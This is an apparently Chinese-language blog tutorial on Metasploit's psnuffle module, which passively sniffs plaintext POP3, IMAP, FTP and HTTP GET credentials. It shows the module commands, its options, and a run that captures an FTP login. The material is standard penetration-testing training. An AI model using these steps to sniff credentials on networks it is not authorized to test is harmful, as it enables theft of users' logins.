Metasploit 密码嗅探

密码嗅探与Metasploit

Max Moser发布了一个名为psnuffle的Metasploit密码嗅探模块,该模块将嗅探与dsniff工具类似的密码。它目前支持POP3,IMAP,FTP和HTTP GET。

 

使用psnuffle模块非常简单。有一些选项可用,但该模块非常适合“打开即用”。

msf > use auxiliary/sniffer/psnuffle
msf auxiliary(psnuffle) > show options

Module options:

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   FILTER                      no        The filter string for capturing traffic
   INTERFACE                   no        The name of the interface
   PCAPFILE                    no        The name of the PCAP capture file to process
   PROTOCOLS  all              yes       A comma-delimited list of protocols to sniff or "all".
   SNAPLEN    65535            yes       The number of bytes to capture
   TIMEOUT    1                yes       The number of seconds to wait for new data

Metasploit 密码嗅探模块psnuffle

 

有一些可用选项,包括导入PCAP捕获文件的功能。我们将在默认模式下运行psnuffle扫描仪。

msf auxiliary(psnuffle) > run
[*] Auxiliary module execution completed
[*] Loaded protocol FTP from /usr/share/metasploit-framework/data/exploits/psnuffle/ftp.rb...
[*] Loaded protocol IMAP from /usr/share/metasploit-framework/data/exploits/psnuffle/imap.rb...
[*] Loaded protocol POP3 from /usr/share/metasploit-framework/data/exploits/psnuffle/pop3.rb...
[*] Loaded protocol URL from /usr/share/metasploit-framework/data/exploits/psnuffle/url.rb...
[*] Sniffing traffic.....
[*] Successful FTP Login: 192.168.1.100:21-192.168.1.5:48614 >> victim / pass (220 3Com 3CDaemon FTP Server Version 2.0)

这里!我们已经捕获了成功的FTP登录。这是一个非常好的被动信息收集工具。

    A+
发布日期:2018年05月10日 19:58:52  所属分类:Metasploit
最后更新时间:2018-05-10 19:58:52
付杰
  • ¥ 49.9元
  • 市场价:99.9元
  • ¥ 199.0元
  • 市场价:199.0元
  • ¥ 0.0元
  • 市场价:99.0元
  • ¥ 15.0元
  • 市场价:15.0元

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: